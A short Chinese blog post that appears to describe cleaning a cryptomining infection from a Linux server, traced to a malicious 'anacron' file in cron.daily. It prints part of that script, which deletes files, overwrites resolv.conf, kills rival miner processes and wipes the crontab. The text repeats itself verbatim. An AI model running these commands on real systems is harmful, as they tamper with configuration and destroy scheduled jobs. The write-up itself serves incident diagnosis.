linux病毒分析
2017-03-15 11:32
190 查看
场景:系统每天早上自动执行一个apache的进程,且占用大量CPU资源如下图
![](https://img-blog.csdn.net/20170315113453501?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvdHpfZ3g=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/Center)
检查分析进程所在路径:
![](https://img-blog.csdn.net/20170315113509064?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvdHpfZ3g=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/Center)
然而tmp目录已经被删除了,kill -9 28271 28251 删除进程了,第二天又会自动启动这个进程,感觉应该是中毒了
解决办法:检查服务器自动执行脚本目录:
![](https://img-blog.csdn.net/20170315113606503?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvdHpfZ3g=/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/Center)
发现cron.daily目录最近被修改过,找到里面新增的文件anacron删除即可
部分anacron文件代码:
cd /tmp
rm -rf apache* httpd.conf* /usr/local/bin/sysmonitord
echo 'nameserver 8.8.8.8'> /etc/resolv.conf
#/sbin/iptables -A OUTPUT -p tcp --dport 45560 -j ACCEPT
kill -9 `ps x|grep stratum|awk '{print $1}'`
kill -9 `ps x|grep httpd.conf|grep -v grep|awk '{print $1}'`
#killall -9 sysmonitord sh wget curl
crontab -r
检查分析进程所在路径:
然而tmp目录已经被删除了,kill -9 28271 28251 删除进程了,第二天又会自动启动这个进程,感觉应该是中毒了
解决办法:检查服务器自动执行脚本目录:
发现cron.daily目录最近被修改过,找到里面新增的文件anacron删除即可
部分anacron文件代码:
cd /tmp
rm -rf apache* httpd.conf* /usr/local/bin/sysmonitord
echo 'nameserver 8.8.8.8'> /etc/resolv.conf
#/sbin/iptables -A OUTPUT -p tcp --dport 45560 -j ACCEPT
kill -9 `ps x|grep stratum|awk '{print $1}'`
kill -9 `ps x|grep httpd.conf|grep -v grep|awk '{print $1}'`
#killall -9 sysmonitord sh wget curl
crontab -r
相关文章推荐
- linux病毒脚本分析
- Linux_Lion病毒分析
- 一个Linux病毒原型分析
- Linux病毒研究与分析
- Linux系统下网络分析例解
- 联机的Linux的系统分析(第一部分)(第一版)
- Linux TCP/IP 协议栈源码分析(一)
- Linux 2.4进程调度分析 4
- Unix/ELF文件格式及病毒分析
- 瑞星发布“MSN骗子”病毒技术分析报告
- linux的病毒发展史及分类 (出处:www.net130.com<---3x)
- Linux开机过程的分析
- Linux V2.2.X(i386体系结构)进程管理分析及 最大进程数的限制的突破
- Linux 2.4调度系统分析
- 深入分析 Linux 内核链表
- 联机的Linux的系统分析(第二部分)(第一版)
- Linux 2.4进程调度分析 3
- Linux 2.4进程调度分析 5
- Linux 2.4进程调度分析 6
- LynxOS、QNX、Linux的分析和比较